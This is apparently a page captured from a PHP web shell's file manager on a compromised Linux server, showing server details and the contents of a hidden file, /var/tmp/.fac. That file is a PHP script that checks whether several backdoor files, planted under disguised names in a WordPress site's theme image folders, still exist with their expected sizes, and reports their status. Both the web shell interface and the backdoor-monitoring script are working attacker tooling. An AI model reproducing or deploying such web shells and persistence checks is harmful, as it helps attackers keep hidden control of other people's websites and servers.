HEX
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
System: Linux server.mediaphic.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: bakeerca (1316)
PHP: 7.3.33
Disabled: exec,passthru,shell_exec,system,show_source,mail,sendmail,popen,symlink,phpinfo
Upload Files
File: //var/tmp/.fac
<?php   $r = '/home/sfcconst/public_html'; $x = ["/wp-content/themes/post-1784823168/assets/images/custom_functions_1784823168.php"=>"bd@@25493@@624",
"/wp-content/themes/post-1784823168/assets/images/custom_functions_1784823168.php"=>"bd@@29083@@624",
"/wp-content/themes/post-1784823168/assets/images/custom_functions_1784823168.php"=>"bd@@32668@@624",
"/wp-content/themes/custom_file_4_1784725096/assets/images/search-template-1784725096.php"=>"bd@@2482@@865",
"/wp-content/themes/category-template-1784822689/template-parts/custom_file_1_1784822690.php"=>"bd@@18105@@866",
"/wp-content/themes/post-1784823168/assets/images/custom_functions_1784823168.php"=>"bd@@21907@@624"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');